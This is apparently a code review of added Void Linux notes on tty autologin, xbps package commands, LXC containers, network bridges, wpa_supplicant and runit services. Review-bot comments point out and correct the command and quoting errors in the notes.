> cp -R /etc/sv/agetty-tty1 /etc/sv/agetty-autologin-tty1
Note: The name of the custom service file must end with -tty1 (or another valid port). Otherwise the run-script will not work.
> vim /etc/sv/agetty-autologin-tty1/conf:
```
GETTY_ARGS="--autologin yourusernamehere --noclear"
BAUD_RATE=38400
TERM_NAME=linux
```
If you are logged in on tty1 right now, logout, switch to tty2 (with CTRL+ALT+F2) and re-login there.
Disable the regular tty1 service and enable autologin:
> rm /var/service/agetty-tty1
> ln -s /etc/sv/agetty-autologin-tty1 /var/service
Now switch to tty1 and you should already be logged in there automatically.
Autostart Graphical Environment on Login
Add the following to your shell's profile file to start X and lock the tty session:
# Autologin on tty1
In `bashrc`.
```
if [ -z "$DISPLAY" ] && [ "$(fgconsole)" -eq 1 ]; then
exec startx
fi
```
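Review bot: the last section contradicts itself: the lead-in says to add the startx snippet to 'your shell's profile file', but the next line says 'In `bashrc`'. It belongs in ~/.bash_profile (or ~/.profile), which runs once at login; .bashrc runs for every interactive shell. `vim /etc/sv/agetty-autologin-tty1/conf:` has a trailing colon that is not part of the command. Worth one sentence in the file as well: `--autologin` on tty1 hands anyone at the keyboard a logged-in shell without a password, so it only suits a machine whose physical access is controlled.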

distros/void/autologin.md Normal file

@@ -0,0 +1,21 @@
Make the autologin service:
> cp -R /etc/sv/agetty-tty1 /etc/sv/agetty-autologin-tty1
> echo "GETTY_ARGS="--autologin yourusernamehere --noclear"
> BAUD_RATE=38400
> TERM_NAME=linux" > /etc/sv/agetty-autologin-tty1/conf
> rm /var/service/agetty-tty1
> ln -s /etc/sv/agetty-autologin-tty1 /var/service
Then stick this at the end of the bashrc:
```
# autologin on tty1
if [ -z "$DISPLAY" ] && [ "$(fgconsole)" -eq 1 ]; then
exec startx
fi
```
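Review bot: `echo "GETTY_ARGS="--autologin yourusernamehere --noclear"` has broken quoting: the inner `"` closes the outer string, so the written conf contains `GETTY_ARGS=--autologin yourusernamehere --noclear` without quotes, and when the run script sources it the shell sets `GETTY_ARGS=--autologin` and then tries to execute `yourusernamehere --noclear` as a command. Escape the inner quotes (`\"`) or write the file with a heredoc (`cat > /etc/sv/agetty-autologin-tty1/conf <<'EOF'`). The `> ` prefixes on the two continuation lines also read as prompts and would be written into the file if the block is pasted literally.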

distros/void/basics.md Normal file

@@ -0,0 +1,20 @@
# vkpurge
Old Void kernels are left on the boot partition. List them with:
> vkpurge list
Remove one with:
> vkpurge 2.8.2_4
Remove all but the latest with:
> vkpurge rm all
# Brightness
/sys/class/backlight/*/brightness

distros/void/extrace.md Normal file

@@ -0,0 +1,12 @@
Monitor all processes:
> extrace
Monitor one process:
> extrace ls
Monitor a script:
> ./script.sh | extrace
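Review bot: `./script.sh | extrace` pipes the script's stdout into extrace and starts extrace with no command, which traces every process on the system for as long as it runs, not the script; the form that traces a command and its children is `extrace ./script.sh`, matching the `extrace ls` line above.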

distros/void/kernels.md Normal file

@@ -0,0 +1,20 @@
# vkpurge
Old Void kernels are left on the boot partition. List them with:
> vkpurge list
Remove one with:
> vkpurge 2.8.2_4
Remove all but the latest with:
> vkpurge rm all
# Troubleshooting
Filled up your /boot? Try reconfiguring and installing the latest:
> xbps-reconfigure -f linux5.2
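Review bot: the `# vkpurge` section duplicates distros/void/basics.md line for line; keep it in one of the two files and link from the other.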

distros/void/keyboard Normal file

@@ -0,0 +1,6 @@
To list keyboard specs:
> locale
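Review bot: `locale` prints the locale environment (LANG and the LC_* variables), not the keyboard layout. On Void the console keymap is the `KEYMAP` setting in /etc/rc.conf, and the X layout is what `setxkbmap -query` reports.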

distros/void/lxc Normal file

@@ -0,0 +1,64 @@
#Intro
Taken from [this](https://r4nd0m6uy.ch/unpriviledged-containers-in-void-linux.html)
Void linux requires additional steps to set up, as Systemd is no present to automatically take care of everything.
> sudo xbps-install cgmanager dbus bridge-utils lxc
Next, startup services:
> sudo ln -s /etc/sv/dbus/ /var/service/
> sudo ln -s /etc/sv/cgmanager/ /var/service/
> sudo sv start dbus
> sudo sv start cgmanager
> sudo sv start dbus
> sudo sv start cgmanager
Maps your user account to the lxc g/u ids:
> sudo usermod --add-subuids 100000-165536 $USER
> sudo usermod --add-subgids 100000-165536 $USER
Then add a bridge interface to connect the container.
> sudo brctl addbr lxbr0
Then add an interface. I have no idea how this is done or what it means, so I tried my wifi 'wlp3s0', and that was refused. I tried the guide's one, which obviously didn't work as I didn't have the same interface as in the guide. Finally, I tried `ip addr show` and noticed other devices 'lo' and 'wwp0s20u4i6'. This gave me:
> sudo brctl addif lxbr0 wwp0s20u4i6
... which worked.
If you don't want to redo this each boot, you can make a runit service for it apparently - more research is required for this. For now, I'm just copy-pasting the guide (almost) and sticking this in ~/.config/lxc/default.conf:
`lxc.network.type = veth`
`lxc.network.link = wwp0s20u4i6`
`lxc.network.flags = up`
`lxc.network.hwaddr = 00:16:3e:BB:CC:DD`
`lxc.id_map = u 0 100000 65536`
`lxc.id_map = g 0 100000 65536`
You can now configure a different bridge each boot to connect with the lxc containers, or ....
Next, do this at *every boot* (or script it):
> sudo cgm create all $USER
> sudo cgm chown all $USER $(id -u) $(id -g)
> cgm movepid all $USER $$
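Review bot: `sudo sv start dbus` and `sudo sv start cgmanager` appear twice in a row; the second pair is a no-op. `#Intro` needs a space after `#` to render as a heading. The `lxc.id_map` lines map 65536 ids starting at 100000, while `usermod --add-subuids 100000-165536` grants 65537; use matching ranges (`100000-165535`) so /etc/subuid and the container config agree, since a mismatch is the usual cause of an unprivileged container failing to start.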


@@ -0,0 +1,34 @@
# Bridged adapters
Virtual machines can use a bridge to connect to the internet. Access the manual with
> man brctl
You can add a new bridge with:
> brctl addbr <name>
... and delete a bridge by pulling it down, then
> brctl delbr <name>
# wpa_supplicant
> scan
> scan_results
> add_network
> set_network 0 ssid "MYSSID"
> set_network 0 psk "passphrase"
OR > set_network 0 key_mgmt NONE
> enable_network 0
> save_config
might want to 'sudo sv restart dhcpcd'
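Review bot: the commands under `# wpa_supplicant` (`scan`, `add_network`, `set_network 0 psk "passphrase"`, `save_config`) are `wpa_cli` interactive commands, not shell commands, so the section should say to start `wpa_cli` first. `save_config` only works when /etc/wpa_supplicant/wpa_supplicant.conf contains `update_config=1`. Setting `psk` to the plaintext passphrase stores it in clear in that file; `wpa_passphrase "MYSSID"` produces the 64-hex derived psk, which is the value worth saving.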


@@ -0,0 +1,20 @@
#!/bin/sh
ln -s /etc/sv/ntpd /var/service
sv start ntpd
sleep 3
ntpd -q
echo 'dtparam=audio=on' >> /boot/config.txt
xbps-install -Syuv
xbps-install -Sy xorg-minimal xf86-video-fbturbo
useradd -m -G wheel,audio,video ghost
xbps-install sc-im vim cowsay lolcat-c ranger lf bash
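Review bot: `useradd -m -G wheel,audio,video ghost` creates a wheel-group account without setting a password, so either follow it with `passwd ghost` or state that the account is meant to stay locked. `xbps-install sc-im vim cowsay lolcat-c ranger lf bash` lacks `-y` and will stop for confirmation in an otherwise non-interactive script; the earlier lines use `-Sy`.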

distros/void/sv Normal file

@@ -0,0 +1,12 @@
# Basics
Services display in /var/service
sv up ssh
sv down ssh
sv restart ssh
# Making a Service
Look in the `/etc/sv` directory, then in the existing services' run files.
You'll find a simple dash script (therefore Posix compliant).
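Review bot: the ssh service directory on Void is /etc/sv/sshd, so `sv up ssh` / `sv down ssh` / `sv restart ssh` should use `sshd`. Those three lines are also missing the `>` prefix the other files use for commands, and `sv up` only works once the service is linked into /var/service, which the 'Making a Service' section could mention (`ln -s /etc/sv/sshd /var/service`).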

distros/void/xbps.md Normal file

@@ -0,0 +1,115 @@
Install cowsay
> xbps-install cowsay
Look for cowsay
> xbps-query -Rs cowsay
Upgrade current packages. -R looks at repositories, -s makes things sloppy.
> xbps-install -Suv
Remove cowsay
> xbps-remove cowsay
...and all dependencies
> xbps-remove -R cowsay
Reinstall cowsay
> xbps-install -f
Reconfigure all packages. Useful for breakages.
> xbps-pkgdb -a
Remove all dependencies.
> xbps-remove -o
Show information about cowsay
> xbps-query -RS cowsay
Search for cows
> xbps-query -Rs cows
List packages requiring updates.
> xbps-install -Suvn
List what's required for cowsay
> xbps-query -x cowsay
List what's installed.
> xbps-query -l
Clean.
> xbps-remove -O
apt update
> xbps-install -S
Remove package information.
> xbps-query -R
Display all cowsay files
> xbps-query -Rf cowsay
Do I have cowsay installed?
> xbps-query -s cowsay
What packages are pointless?
> xbps-query -O
> xbps-install -Sn cowsay
A dry-run of installing cowsay, without actually intalling.
# Advanced
> xbps-query -x cowsay
Show cowsay's dependencies. The -R flag's required for a remote package.
> xbps-query -X cowsay
Show the reverse dependencies of a package.
> xbps-query -XR cowsay
Show all reverse dependencies of a package, including repository packages.
> xbps-query -m
List all manually installed software.
# Problems
Look for broken packages.
> sudo xbps-pkgdb -a
And if you've found any, you might try:
> sudo xbps-reconfigure -af
This reconfigures all packages forcefully.
If that doesn't help the issue, try to find the broken package and forcefully reinstall:
> xbps-query -s gnutls
> sudo xbps-install -f gnutls
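Review bot: the flag description 'Upgrade current packages. -R looks at repositories, -s makes things sloppy' does not match `xbps-install -Suv`: there `-S` syncs the repository index, `-u` upgrades and `-v` is verbose; `-R` and `-s` are xbps-query flags (repository mode and search). `xbps-install -f` under 'Reinstall cowsay' is missing the package name (`xbps-install -f cowsay`). 'Remove package information. > xbps-query -R' does nothing on its own, since `-R` only selects repository mode for another query. `xbps-query -x cowsay` is listed twice with different descriptions ('List what's required for cowsay' and 'Show cowsay's dependencies'); keep one.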